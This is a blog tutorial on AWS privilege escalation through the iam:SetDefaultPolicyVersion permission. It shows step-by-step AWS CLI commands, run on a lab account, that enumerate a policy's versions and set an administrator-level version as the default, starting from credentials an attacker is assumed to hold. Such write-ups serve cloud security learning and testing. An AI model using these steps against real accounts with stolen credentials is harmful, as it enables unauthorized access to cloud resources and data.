Privelege Escalation Series 1 - iam:SetDefaultPolicyVersion
- Ts3c
- AWS , Privilege Escalation , Cloud
- January 22, 2024
In this series of blog posts I will describe some techniques of how we can do privilege escalation in AWS.
The first one will be the permission iam:SetDefaultPolicyVersion.
Let’s assume an attacker is able to gain access to valid AWS Credentials. After the attacker analysed the Credentials and the permissions he figured out that it using the Credential he is able to list the policies attached to the user which credential he uses and can set the default policy to another policy version.
Now enough of the theoretical part, let’s jump into the hand-on practice.
First we want to know what type of Credentials we found:
aws sts get-caller-identity --profile testuser
Then we want to list the DB instances.
aws rds describe-db-instances --region us-east-1 --profile testuser
This action does not work because the User testuser does not have the necessary permissions. Let’s continue our enumeration.
Next we will have a look at the IAM permissions. Therefore we list all the attached policies for the user testuser.
aws iam list-attached-user-policies --user-name testuser --profile testuser
We receive a list with one entry. This policy we will analyse in more detail. For this we can call the get-policy Endpoint.
aws iam get-policy --policy-arn arn:aws:iam::<account-id>:policy/test_priv_esc_policy --profile testuser
We successfully receive some details of this policy. We also can see that this policy has 7 Versions. In the AWS documentation we can see that AWS only saves the last 5 policy versions.
We now need to analyse the policy versions. At the moment the Version 6 is set to default. If we want to analyse this version we need to call the get-policy-version endpoint with the version-id set to 6.
aws iam get-policy-version --policy-arn arn:aws:iam::<account-id>:policy/test_priv_esc_policy --version-id v6 --profile testuser
This seems pretty normal. This step needs to be repeated several times. In the end we can analyse the policy version 7.
aws iam get-policy-version --policy-arn arn:aws:iam::<account-id>:policy/test_priv_esc_policy --version-id v7 --profile testuser
Nice! This policy version has administrator rights. We are able to set the default policy version to therefore we set the version id to 7 and could successfully escalated our privileges.
aws iam set-default-policy-version --policy-arn arn:aws:iam::<account-id>:policy/test_priv_esc_policy --version-id v7 --profile testuser
In the beginning we wanted to list all the database instances. If we now run this command again we can see that it is working like a charm.
aws rds describe-db-instances --region us-east-1 --profile testuser
